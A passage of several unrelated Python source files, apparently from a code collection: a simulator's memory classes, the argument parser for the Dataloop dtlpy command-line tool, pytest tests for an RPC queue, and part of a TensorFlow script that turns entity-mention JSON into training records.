raise Exception('Invalid num_bytes: %d!' % num_bytes)
if self.debug.enabled( "mem" ):
print '%s' % pad_hex( value ),
return r_uint( value )
# this is instruction read, which is otherwise identical to read. The
# only difference is the elidable annotation, which we assume the
# instructions are not modified (no side effects, assumes the addresses
# correspond to the same instructions)
@elidable
def iread( self, start_addr, num_bytes ):
assert start_addr & 0b11 == 0 # only aligned accesses allowed
return r_uint( widen( self.data[ start_addr >> 2 ] ) )
@specialize.argtype(1, 3)
@unroll_safe
def write( self, start_addr, num_bytes, value ):
assert 0 < num_bytes <= 4
start_addr = r_uint( start_addr )
value = r_uint( value )
word = start_addr >> 2
byte = start_addr & 0b11
if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
self.bounds_check( start_addr, 'WR' )
if num_bytes == 4: # TODO: byte should only be 0 (only aligned)
pass # no masking needed
elif num_bytes == 2: # TODO: byte should only be 0, 1, 2, not 3
mask = ~(0xFFFF << (byte * 8)) & r_uint( 0xFFFFFFFF )
value = ( widen( self.data[ word ] ) & mask ) \
| ( (value & 0xFFFF) << (byte * 8) )
elif num_bytes == 1:
mask = ~(0xFF << (byte * 8)) & r_uint( 0xFFFFFFFF )
value = ( widen( self.data[ word ] ) & mask ) \
| ( (value & 0xFF ) << (byte * 8) )
else:
raise Exception('Invalid num_bytes: %d!' % num_bytes)
if self.debug.enabled( "mem" ) and not self.suppress_debug:
print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
pad_hex( value ) ),
self.data[ word ] = r_uint32( value )
#-----------------------------------------------------------------------
# _ByteMemory
#-----------------------------------------------------------------------
class _ByteMemory( object ):
def __init__( self, data=None, size=2**10, suppress_debug=False ):
self.data = data if data else [' '] * size
self.size = len( self.data )
self.debug = Debug()
self.suppress_debug = suppress_debug
def bounds_check( self, addr ):
# check if the accessed data is larger than the memory size
if addr > self.size:
print "WARNING: accessing larger address than memory size. " + \
"addr=%s size=%s" % ( pad_hex( addr ), pad_hex( self.size ) )
if addr == 0:
print "WARNING: writing null pointer!"
raise Exception()
@unroll_safe
def read( self, start_addr, num_bytes ):
if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
self.bounds_check( start_addr )
value = 0
if self.debug.enabled( "mem" ) and not self.suppress_debug:
print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
for i in range( num_bytes-1, -1, -1 ):
value = value << 8
value = value | ord( self.data[ start_addr + i ] )
if self.debug.enabled( "mem" ) and not self.suppress_debug:
print '%s' % pad_hex( value ),
return value
# this is instruction read, which is otherwise identical to read. The
# only difference is the elidable annotation, which we assume the
# instructions are not modified (no side effects, assumes the addresses
# correspond to the same instructions)
@elidable
def iread( self, start_addr, num_bytes ):
value = 0
for i in range( num_bytes-1, -1, -1 ):
value = value << 8
value = value | ord( self.data[ start_addr + i ] )
return value
@unroll_safe
def write( self, start_addr, num_bytes, value ):
if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
self.bounds_check( start_addr )
if self.debug.enabled( "mem" ) and not self.suppress_debug:
print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
pad_hex( value ) ),
for i in range( num_bytes ):
self.data[ start_addr + i ] = chr(value & 0xFF)
value = value >> 8
#-----------------------------------------------------------------------
# _SparseMemory
#-----------------------------------------------------------------------
class _SparseMemory( object ):
_immutable_fields_ = [ "BlockMemory", "block_size", "addr_mask",
"block_mask" ]
def __init__( self, BlockMemory, block_size=2**10 ):
self.BlockMemory = BlockMemory
self.block_size = block_size
self.addr_mask = block_size - 1
self.block_mask = 0xffffffff ^ self.addr_mask
self.debug = Debug()
print "sparse memory size %x addr mask %x block mask %x" \
% ( self.block_size, self.addr_mask, self.block_mask )
#blocks = []
self.block_dict = {}
self.debug = Debug()
def add_block( self, block_addr ):
#print "adding block: %x" % block_addr
self.block_dict[ block_addr ] = self.BlockMemory( size=self.block_size,
suppress_debug=True )
@elidable
def get_block_mem( self, block_addr ):
#block_idx = block_dict[
if block_addr not in self.block_dict:
self.add_block( block_addr )
block_mem = self.block_dict[ block_addr ]
return block_mem
@elidable
def iread( self, start_addr, num_bytes ):
start_addr = hint( start_addr, promote=True )
num_bytes = hint( num_bytes, promote=True )
end_addr = start_addr + num_bytes - 1
block_addr = self.block_mask & start_addr
block_mem = self.get_block_mem( block_addr )
# For mixed-width ISAs, the start_addr is not necessarily
# word-aligned, and can cross block memory boundaries. If there is
# such a case, we have two instruction reads and then form the word
# for it
block_end_addr = self.block_mask & end_addr
if block_addr == block_end_addr:
return block_mem.iread( start_addr & self.addr_mask, num_bytes )
else:
num_bytes1 = min( self.block_size - (start_addr & self.addr_mask),
num_bytes )
num_bytes2 = num_bytes - num_bytes1
block_mem1 = block_mem
block_mem2 = self.get_block_mem( block_end_addr )
value1 = block_mem1.iread( start_addr & self.addr_mask, num_bytes1 )
value2 = block_mem2.iread( 0, num_bytes2 )
value = value1 | ( value2 << (num_bytes1*8) )
#print "nb1", num_bytes1, "nb2", num_bytes2, \
# "ba1", hex(block_addr), "ba2", hex(block_end_addr), \
# "v1", hex(value1), "v2", hex(value2), "v", hex(value)
return value
def read( self, start_addr, num_bytes ):
if self.debug.enabled( "mem" ):
print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
block_addr = self.block_mask & start_addr
block_addr = hint( block_addr, promote=True )
block_mem = self.get_block_mem( block_addr )
value = block_mem.read( start_addr & self.addr_mask, num_bytes )
if self.debug.enabled( "mem" ):
print '%s' % pad_hex( value ),
return value
def write( self, start_addr, num_bytes, value ):
if self.debug.enabled( "mem" ):
print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
pad_hex( value ) ),
block_addr = self.block_mask & start_addr
block_addr = hint( block_addr, promote=True )
block_mem = self.get_block_mem( block_addr )
block_mem.write( start_addr & self.addr_mask, num_bytes, value )
|
<filename>dtlpy/dlp/parser.py
import argparse
def get_parser():
"""
Build the parser for CLI
:return: parser object
"""
parser = argparse.ArgumentParser(
description="CLI for Dataloop",
formatter_class=argparse.RawTextHelpFormatter
)
###############
# sub parsers #
###############
subparsers = parser.add_subparsers(dest="operation", help="supported operations")
########
# shell #
########
subparsers.add_parser("shell", help="Open interactive Dataloop shell")
########
# shell #
########
a = subparsers.add_parser("upgrade", help="Update dtlpy package")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-u", "--url", metavar='\b', help="Package url. default 'dtlpy'", default=None)
##################
# Login / Logout #
##################
subparsers.add_parser("logout", help="Logout")
subparsers.add_parser("login", help="Login using web Auth0 interface")
a = subparsers.add_parser("login-token", help="Login by passing a valid token")
required = a.add_argument_group("required named arguments")
required.add_argument(
"-t", "--token", metavar='\b', help="valid token", required=True
)
a = subparsers.add_parser("login-secret", help="Login client id and secret")
required = a.add_argument_group("required named arguments")
required.add_argument(
"-e", "--email", metavar='\b', help="user email", required=False, default=None
)
required.add_argument(
"-p", "--password", metavar='\b', help="user password", required=False, default=None
)
required.add_argument(
"-i", "--client-id", metavar='\b', help="client id", required=False, default=None
)
required.add_argument(
"-s", "--client-secret", metavar='\b', help="client secret", required=False, default=None
)
a = subparsers.add_parser("login-m2m", help="Login client id and secret")
required = a.add_argument_group("required named arguments")
required.add_argument(
"-e", "--email", metavar='\b', help="user email", required=False, default=None
)
required.add_argument(
"-p", "--password", metavar='\b', help="user password", required=False, default=None
)
required.add_argument(
"-i", "--client-id", metavar='\b', help="client id", required=False, default=None
)
required.add_argument(
"-s", "--client-secret", metavar='\b', help="client secret", required=False, default=None
)
########
# Init #
########
subparsers.add_parser("init", help="Initialize a .dataloop context")
##################
# Checkout state #
##################
subparsers.add_parser("checkout-state", help="Print checkout state")
########
# Help #
########
subparsers.add_parser("help", help="Get help")
###########
# version #
###########
parser.add_argument("-v", "--version", action="store_true", help="dtlpy version")
subparsers.add_parser("version", help="DTLPY SDK version")
#######
# API #
#######
subparser = subparsers.add_parser("api", help="Connection and environment")
subparser_parser = subparser.add_subparsers(dest="api", help="gate operations")
# ACTIONS #
# info
subparser_parser.add_parser("info", help="Print api information")
# setenv
a = subparser_parser.add_parser("setenv", help="Set platform environment")
required = a.add_argument_group("required named arguments")
required.add_argument("-e", "--env", metavar='\b', help="working environment", required=True)
############
# Projects #
############
subparser = subparsers.add_parser("projects", help="Operations with projects")
subparser_parser = subparser.add_subparsers(
dest="projects", help="projects operations"
)
# ACTIONS #
# list
subparser_parser.add_parser("ls", help="List all projects")
# create
a = subparser_parser.add_parser("create", help="Create a new project")
required = a.add_argument_group("required named arguments")
required.add_argument("-p", "--project-name", metavar='\b', help="project name")
# checkout
a = subparser_parser.add_parser("checkout", help="checkout a project")
required = a.add_argument_group("required named arguments")
required.add_argument("-p", "--project-name", metavar='\b', help="project name")
# open web
a = subparser_parser.add_parser("web", help="Open in web browser")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', help="project name")
############
# Datasets #
############
subparser = subparsers.add_parser("datasets", help="Operations with datasets")
subparser_parser = subparser.add_subparsers(dest="datasets", help="datasets operations")
# ACTIONS #
# open web
a = subparser_parser.add_parser("web", help="Open in web browser")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', help="project name")
optional.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
# list
a = subparser_parser.add_parser("ls", help="List of datasets in project")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
# create
a = subparser_parser.add_parser("create", help="Create a new dataset")
required = a.add_argument_group("required named arguments")
required.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name", required=True)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
optional.add_argument("-c", "--checkout", action='store_true', default=False, help="checkout the new dataset")
# checkout
a = subparser_parser.add_parser("checkout", help="checkout a dataset")
required = a.add_argument_group("required named arguments")
required.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
#########
# items #
#########
subparser = subparsers.add_parser("items", help="Operations with items")
subparser_parser = subparser.add_subparsers(dest="items", help="items operations")
# ACTIONS #
a = subparser_parser.add_parser("web", help="Open in web browser")
required = a.add_argument_group("required named arguments")
required.add_argument("-r", "--remote-path", metavar='\b', help="remote path")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', help="project name")
optional.add_argument("-d", "--dataset-name", metavar='\b', help="dataset name")
# list
a = subparser_parser.add_parser("ls", help="List of items in dataset")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
help="dataset name. Default taken from checked out (if checked out)")
optional.add_argument("-o", "--page", metavar='\b', help="page number (integer)", default=0)
optional.add_argument("-r", "--remote-path", metavar='\b', help="remote path", default=None)
optional.add_argument("-t", "--type", metavar='\b', help="Item type", default=None)
# upload
a = subparser_parser.add_parser("upload", help="Upload directory to dataset")
required = a.add_argument_group("required named arguments")
required.add_argument("-l", "--local-path", required=True, metavar='\b',
help="local path")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
help="dataset name. Default taken from checked out (if checked out)")
optional.add_argument("-r", "--remote-path", metavar='\b', default=None,
help="remote path to upload to. default: /")
optional.add_argument("-f", "--file-types", metavar='\b', default=None,
help='Comma separated list of file types to upload, e.g ".jpg,.png". default: all')
optional.add_argument("-lap", "--local-annotations-path", metavar='\b', default=None,
help="Path for local annotations to upload with items")
optional.add_argument("-ow", "--overwrite", dest="overwrite", action='store_true', default=False,
help="Overwrite existing item")
# download
a = subparser_parser.add_parser("download", help="Download dataset to a local directory")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", metavar='\b', default=None,
help="project name. Default taken from checked out (if checked out)")
optional.add_argument("-d", "--dataset-name", metavar='\b', default=None,
help="dataset name. Default taken from checked out (if checked out)")
optional.add_argument("-ao", "--annotation-options", metavar='\b',
help="which annotation to download. options: json,instance,mask", default=None)
optional.add_argument("-aft", "--annotation-filter-type", metavar='\b',
help="annotation type filter when downloading annotations. "
"options: box,segment,binary etc", default=None)
optional.add_argument("-afl", "--annotation-filter-label", metavar='\b',
help="labels filter when downloading annotations.", default=None)
optional.add_argument("-r", "--remote-path", metavar='\b', default=None,
help="remote path to upload to. default: /")
optional.add_argument("-ow", "--overwrite", action='store_true', default=False,
help="Overwrite existing item")
optional.add_argument("-t", "--not-items-folder", action='store_true', default=False,
help="Download WITHOUT 'items' folder")
optional.add_argument("-wt", "--with-text", action='store_true', default=False,
help="Annotations will have text in mask")
optional.add_argument("-th", "--thickness", metavar='\b', default="1",
help="Annotation line thickness")
optional.add_argument("-l", "--local-path", metavar='\b', default=None,
help="local path")
optional.add_argument("-wb", "--without-binaries", action='store_true', default=False,
help="Don't download item binaries")
##########
# videos #
##########
subparser = subparsers.add_parser("videos", help="Operations with videos")
subparser_parser = subparser.add_subparsers(dest="videos", help="videos operations")
# ACTIONS #
# play
a = subparser_parser.add_parser("play", help="Play video")
optional = a.add_argument_group("optional named arguments")
optional.add_argument(
"-l",
"--item-path",
metavar='\b',
default=None,
help="Video remote path in platform. e.g /dogs/dog.mp4",
)
optional.add_argument(
"-p",
"--project-name",
metavar='\b',
default=None,
help="project name. Default taken from checked out (if checked out)",
)
optional.add_argument(
"-d",
"--dataset-name",
metavar='\b',
default=None,
help="dataset name. Default taken from checked out (if checked out)",
)
# upload
a = subparser_parser.add_parser("upload", help="Upload a single video")
required = a.add_argument_group("required named arguments")
required.add_argument(
"-f", "--filename", metavar='\b', help="local filename to upload", required=True
)
required.add_argument(
"-p", "--project-name", metavar='\b', help="project name", required=True
)
required.add_argument(
"-d", "--dataset-name", metavar='\b', help="dataset name", required=True
)
optional = a.add_argument_group("optional named arguments")
optional.add_argument(
"-r", "--remote-path", metavar='\b', help="remote path", default="/"
)
# split video to chunks
optional.add_argument(
"-sc",
"--split-chunks",
metavar='\b',
default=None,
help="Video splitting parameter: Number of chunks to split",
)
optional.add_argument(
"-ss",
"--split-seconds",
metavar='\b',
default=None,
help="Video splitting parameter: Seconds of each chuck",
)
optional.add_argument(
"-st",
"--split-times",
metavar='\b',
default=None,
help="Video splitting parameter: List of seconds to split at. e.g 600,1800,2000",
)
# encode
optional.add_argument(
"-e",
"--encode",
action="store_true",
default=False,
help="encode video to mp4, remove bframes and upload",
)
############
# Services #
############
subparser = subparsers.add_parser("services", help="Operations with services")
subparser_parser = subparser.add_subparsers(dest="services", help="services operations")
# ACTIONS #
# execute
a = subparser_parser.add_parser("execute", help="Create an execution")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-f", "--function-name", dest="function_name", default=None,
help="which function to run")
optional.add_argument("-s", "--service-name", dest="service_name", default=None,
help="which service to run")
optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-as", "--async", dest="asynchronous", default=True, action='store_false',
help="Async execution ")
optional.add_argument("-i", "--item-id", dest="item_id", default=None,
help="Item input")
optional.add_argument("-d", "--dataset-id", dest="dataset_id", default=None,
help="Dataset input")
optional.add_argument("-a", "--annotation-id", dest="annotation_id", default=None,
help="Annotation input")
optional.add_argument("-in", "--inputs", dest="inputs", default='{}',
help="Dictionary string input")
# tear-down
a = subparser_parser.add_parser(
"tear-down", help="tear-down service of service.json file"
)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-l", "--local-path", dest="local_path", default=None,
help="path to service.json file")
optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
help="Project name")
# ls
a = subparser_parser.add_parser("ls", help="List project's services")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
# log
a = subparser_parser.add_parser("log", help="Get services log")
optional = a.add_argument_group("required named arguments")
optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-f", "--service-name", dest="service_name", default=None,
help="Project name")
optional.add_argument("-t", "--start", dest="start", default=None,
help="Log start time")
# delete
a = subparser_parser.add_parser("delete", help="Delete Service")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-f", "--service-name", dest="service_name", default=None,
help="Service name")
optional.add_argument("-p", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
############
# Triggers #
############
subparser = subparsers.add_parser("triggers", help="Operations with triggers")
subparser_parser = subparser.add_subparsers(dest="triggers", help="triggers operations")
# ACTIONS #
# create
a = subparser_parser.add_parser("create", help="Create a Service Trigger")
required = a.add_argument_group("required named arguments")
required.add_argument("-r", "--resource", dest="resource",
help="Resource name", required=True)
required.add_argument("-a", "--actions", dest="actions", help="Actions", required=True)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
optional.add_argument("-f", "--service-name", dest="service_name",
help="Service name", default=None)
optional.add_argument("-n", "--name", dest="name",
help="Trigger name", default=None)
optional.add_argument("-fl", "--filters", dest="filters", default='{}',
help="Json filter")
optional.add_argument("-fn", "--function-name", dest="function_name", default='run',
help="Function name")
# delete
a = subparser_parser.add_parser("delete", help="Delete Trigger")
required = a.add_argument_group("required named arguments")
required.add_argument("-t", "--trigger-name", dest="trigger_name", default=None,
help="Trigger name", required=True)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-f", "--service-name", dest="service_name", default=None,
help="Service name")
optional.add_argument("-p", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
a = subparser_parser.add_parser("ls", help="List triggers")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-pr", "--project-name", dest="project_name", default=None,
help="Project name")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
optional.add_argument("-s", "--service-name", dest="service_name", default=None,
help="Service name")
############
# Deploy #
############
# subparsers.add_parser("deploy", help="Login using web Auth0 interface")
a = subparsers.add_parser("deploy", help="deploy with json file")
required = a.add_argument_group("required named arguments")
required.add_argument("-f", dest="json_file", default=None,
help="Path to json file")
required.add_argument("-p", dest="project_name", default=None,
help="Project name")
############
# Generate #
############
# subparsers.add_parser("deploy", help="Login using web Auth0 interface")
a = subparsers.add_parser("generate", help="generate a json file")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("--option", dest="package_type", default=None,
help="cataluge of examples")
optional.add_argument("-p", "--package-name", dest="package_name", default=None,
help="Package name")
############
# packages #
############
subparser = subparsers.add_parser("packages", help="Operations with packages")
subparser_parser = subparser.add_subparsers(
dest="packages", help="package operations"
)
# ACTIONS #
# ls
a = subparser_parser.add_parser("ls", help="List packages")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-p", "--project-name", dest="project_name", default=None,
help="Project name")
# push
a = subparser_parser.add_parser("push", help="Create package in platform")
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-src", "--src-path", metavar='\b', default=None,
help="Revision to deploy if selected True")
optional.add_argument("-cid", "--codebase-id", metavar='\b', default=None,
help="Revision to deploy if selected True")
optional.add_argument("-pr", "--project-name", metavar='\b', default=None,
help="Project name")
optional.add_argument("-p", "--package-name", metavar='\b', default=None,
help="Package name")
# test
a = subparser_parser.add_parser(
"test", help="Tests that Package locally using mock.json"
)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-c", "--concurrency", metavar='\b', default=10,
help="Revision to deploy if selected True")
optional.add_argument("-f", "--function-name", metavar='\b', default='run',
help="Function to test")
# checkout
a = subparser_parser.add_parser("checkout", help="checkout a package")
required = a.add_argument_group("required named arguments")
required.add_argument("-p", "--package-name", metavar='\b', help="package name")
# delete
a = subparser_parser.add_parser(
"delete", help="Delete Package"
)
optional = a.add_argument_group("optional named arguments")
optional.add_argument("-pkg", "--package-name", dest="package_name", default=None,
help="Package name")
optional.add_argument("-p", "--project-name", dest="project_name", default=None,
help="Project name")
#########
# Shell #
#########
# ls
subparsers.add_parser("ls", help="List directories")
#
# pwd
subparsers.add_parser("pwd", help="Get current working directory")
# cd
subparser = subparsers.add_parser("cd", help="Change current working directory")
subparser.add_argument(dest='dir')
# mkdir
subparser = subparsers.add_parser("mkdir", help="Make directory")
subparser.add_argument(dest='name')
# clear
subparsers.add_parser("clear", help="Clear shell")
########
# Exit #
########
subparsers.add_parser("exit", help="Exit interactive shell")
return parser
|
<gh_stars>0
import pytest
from sciutils.jobs import RpcQueue, local
from collections import deque
class MockQueue(object):
def __init__(self):
self._queue = deque()
def put(self, obj):
self._queue.append(obj)
def get(self):
return self._queue.popleft()
def __len__(self):
return len(self._queue)
MOCK_QUEUE_CLASS = MockQueue
class MockObject(object):
def __init__(self, rpc_id):
self.rpc_id = rpc_id
def mock_method(self, *args, **kwargs):
return self, args, kwargs
@local
def remote_method(self, *args, **kwargs):
return self, args, kwargs
@pytest.fixture
def queue():
return RpcQueue(queue=MOCK_QUEUE_CLASS)
@pytest.fixture
def queue_with_obj():
q = RpcQueue(queue=MOCK_QUEUE_CLASS)
mo = MockObject(123)
q.register(mo)
return q, mo
def test_initial_state(queue):
assert queue.n_producers == 0
assert queue.n_consumers == 0
assert not queue.is_finished
def test_register(queue_with_obj):
queue, mo = queue_with_obj
assert queue.get_object_key(mo) == mo.rpc_id
def test_counting_producers(queue):
queue.add_producer()
assert queue.n_producers == 1
assert queue.n_consumers == 0
assert not queue.is_finished
queue.add_producer()
assert queue.n_producers == 2
assert queue.n_consumers == 0
assert not queue.is_finished
queue.remove_producer()
assert queue.n_producers == 1
assert queue.n_consumers == 0
assert not queue.is_finished
queue.remove_producer()
assert queue.n_producers == 0
assert queue.n_consumers == 0
assert not queue.is_finished
def test_counting_consumers(queue):
queue.add_consumer()
assert queue.n_producers == 0
assert queue.n_consumers == 1
assert not queue.is_finished
queue.add_consumer()
assert queue.n_producers == 0
assert queue.n_consumers == 2
assert not queue.is_finished
queue.remove_consumer()
assert queue.n_producers == 0
assert queue.n_consumers == 1
assert not queue.is_finished
queue.remove_consumer()
assert queue.n_producers == 0
assert queue.n_consumers == 0
assert not queue.is_finished
def test_put(queue_with_obj):
queue, mo = queue_with_obj
old_len = len(queue._queue)
queue.put(mo.mock_method)
assert len(queue._queue) == old_len + 1
def test_put_raw(queue_with_obj):
queue, mo = queue_with_obj
old_len = len(queue._queue)
queue.put_raw(mo, mo.mock_method, (), {})
assert len(queue._queue) == old_len + 1
def test_get(queue_with_obj):
queue, mo = queue_with_obj
args = (1, 2)
kwargs = {'kw1': 1, 'kw2': 2}
queue.put(mo.mock_method, *args, **kwargs)
method, args_res, kwargs_res = queue.get()
assert method.__self__ == mo
assert method == mo.mock_method
assert args_res == args
assert kwargs_res == kwargs
def test_finish(queue):
n_cons = 3
for _ in range(n_cons):
queue.add_consumer()
queue.finish()
assert queue.is_finished
for i in range(n_cons):
assert queue._queue.get() == RpcQueue.FINISHED_TOKEN
def test_wrap_method(queue_with_obj):
queue, mo = queue_with_obj
args = (1, 2)
kwargs = {'kw1': 1, 'kw2': 2}
wrapped = queue.wrap_method(mo.remote_method)
assert callable(wrapped)
wrapped(mo, *args, **kwargs)
remote_res = queue.get()
assert remote_res == (mo.remote_method, args, kwargs)
def test_wrap_target(queue_with_obj):
queue, mo = queue_with_obj
args = (1, 2)
kwargs = {'kw1': 1, 'kw2': 2}
wrapped = queue.wrap_target(mo)
local_res = mo.mock_method(*args, **kwargs)
assert local_res == (mo, args, kwargs)
assert mo.remote_method(*args, **kwargs) is None
remote_res = queue.get()
assert remote_res == (mo.remote_method, args, kwargs) |
<gh_stars>10-100
"""
Convert sanitized json data to tfrecord data format.
"""
import sys
import collections
import json
import pickle
import numpy as np
import tensorflow as tf
def invert_dict(dictionary):
"""
Invert a dict object.
"""
return {v:k for k, v in dictionary.items()}
def _read_words(filepath):
"""
Return word list in tokens of json file.
"""
words = []
with open(filepath, 'r', encoding='utf-8') as file_p:
for row in file_p:
words.extend(json.loads(row)['tokens'])
counter = collections.Counter(words)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], str(x[0])))
words, counts = list(zip(*count_pairs))
return words, counts
def _read_mention_chars(filepath, remove_below):
"""
Return character list in mentions of json file.
"""
char_list = []
with open(filepath, 'r', encoding='utf-8') as file_p:
for row in file_p:
json_data = json.loads(row)
tokens = json_data['tokens']
for mention in json_data['mentions']:
for char in ' '.join(tokens[mention['start']:mention['end']]):
char_list.append(char)
counter = collections.Counter(char_list)
chrs, counts = list(zip(*sorted(counter.items(), key=lambda x: (-x[1], x[0]))))
chrs = np.array(chrs)
counts = np.array(counts)
# remove infrequent characters
mask = counts >= remove_below
chrs = chrs[mask]
counts = counts[mask]
# 0th character will be used as padding
num_to_chrs = dict(enumerate(chrs, 1))
# add unique character
num_to_chrs[len(num_to_chrs) + 1] = 'unk'
# add end of mention character
num_to_chrs[len(num_to_chrs) + 1] = 'eos'
chrs_to_num = invert_dict(num_to_chrs)
return chrs_to_num
def load_filtered_embeddings(filepath, word_list):
"""
Load selected pre-trained word vectors based on word list.
"""
word_dic = {}
word_found = set()
word_set = set(word_list)
with open(filepath, 'r', encoding='utf-8') as file_p:
for line in file_p:
splits = line.split(' ')
word = splits[0]
if word in word_set or word == 'unk':
word_dic[word] = [float(x) for x in splits[1:]]
word_found.add(word)
word_not_found = word_set.difference(word_found)
# enumeration will start from 1
word_to_num = dict(zip(word_dic.keys(), range(1, len(word_dic) + 1)))
# 0th pre_trained_embedding will be remain 0
pre_trained_embeddings = np.zeros((len(word_to_num) + 1, len(word_dic['unk'])),
dtype=np.core.numerictypes.float32
)
for word in word_to_num:
pre_trained_embeddings[word_to_num[word]] = word_dic[word]
return word_to_num, pre_trained_embeddings, word_not_found
def generate_labels_to_numbers(dataset, sanitized_directory):
"""
Generate label to number dictionary.
"""
with open(sanitized_directory + dataset + '/sanitized_labels.txt', 'r') as file_p:
label_list = file_p.read().split('\n')
num_to_label = dict(zip(label_list, range(len(label_list))))
return num_to_label
def generate_features_to_numbers(dataset, sanitized_directory):
"""
Generate pos and dep type to number dictionary.
"""
with open(sanitized_directory + dataset + '/sanitized_pos.txt', 'r') as file_p:
pos_list = file_p.read().split('\n')
num_to_pos = dict(zip(pos_list, range(len(pos_list))))
with open(sanitized_directory + dataset + '/sanitized_dep_type.txt', 'r') as file_p:
dep_type_list = file_p.read().split('\n')
num_to_dep_type = dict(zip(dep_type_list, range(len(dep_type_list))))
return num_to_pos, num_to_dep_type
def labels_status(labels):
"""
Check is labels is clean or not.
"""
leaf = max(labels, key=lambda x: x.count('/'))
clean = 1
for label in labels:
if label not in leaf:
clean = 0
return clean
#pylint: disable-msg=R0914
def make_tf_record_f1(json_data, mention, mappings):
"""
A tfrecord per mention.
"""
start = mention['start']
end = mention['end']
tokens = json_data['tokens']
poss = json_data['pos']
dep_types = json_data['dep']
uid = bytes('_'.join([json_data['fileid'],
str(json_data['senid']),
str(start),
str(end)
]), 'utf-8')
# lc and rc include mention
left_context = tokens[:end]
entity = tokens[start:end]
right_context = tokens[start:]
left_poss = poss[:end]
right_poss = poss[start:]
left_dts = dep_types[:end]
right_dts = dep_types[start:]
ex = tf.train.SequenceExample()
ex.context.feature["uid"].bytes_list.value.append(uid)
ex.context.feature["lcl"].int64_list.value.append(len(left_context))
ex.context.feature["rcl"].int64_list.value.append(len(right_context))
ex.context.feature["eml"].int64_list.value.append(len(' '.join(entity)) + 1)
ex.context.feature["clean"].int64_list.value.append(labels_status(mention['labels']))
lc_ids = ex.feature_lists.feature_list["lci"]
rc_ids = ex.feature_lists.feature_list["rci"]
em_ids = ex.feature_lists.feature_list["emi"]
l_pos_ids = ex.feature_lists.feature_list["lpi"]
r_pos_ids = ex.feature_lists.feature_list["rpi"]
l_dt_ids = ex.feature_lists.feature_list["ldti"]
r_dt_ids = ex.feature_lists.feature_list["rdti"]
label_list = ex.feature_lists.feature_list["labels"]
for word in left_context:
lc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
mappings['wtn']['unk']))
for word in right_context:
rc_ids.feature.add().int64_list.value.append(mappings['wtn'].get(word,
mappings['wtn']['unk']))
for char in ' '.join(entity):
em_ids.feature.add().int64_list.value.append(mappings['ctn'].get(char,
mappings['ctn']['unk']))
em_ids.feature.add().int64_list.value.append(mappings['ctn']['eos'])
for pos in left_poss:
l_pos_ids.feature.add().int64_list.value.append(mappings['ptn'][pos])
for pos in right_poss:
r_pos_ids.feature.add().int64_list.value.append(mappings['ptn'][pos])
for dep_type in left_dts:
l_dt_ids.feature.add().int64_list.value.append(mappings['dttn'][dep_type['type']])
for dep_type in right_dts:
# small hack, get(dep_type, 0) need to fix this when doing transfer learning
# with Wiki and OntoNotes dataset
# conj:uh not found in Wiki dataset
# For all other experiments, this will not affect
r_dt_ids.feature.add().int64_list.value.append(mappings['dttn'].get(dep_type['type'], 0))
temp_labels = [0] * len(mappings['ltn'])
for label in mention['labels']:
temp_labels[mappings['ltn'][label]] = 1
for label in temp_labels:
label_list.feature.add().int64_list.value.append(label)
return ex
#pylint: disable-msg=R0914
def make_tf_record_f2(json_data, mention, mappings, mention_window, context_window):
"""
A tfrecord per mention.
"""
start = mention['start']
end = mention['end']
tokens = json_data['tokens']
uid = bytes('_'.join([json_data['fileid'],
str(json_data['senid']),
str(start),
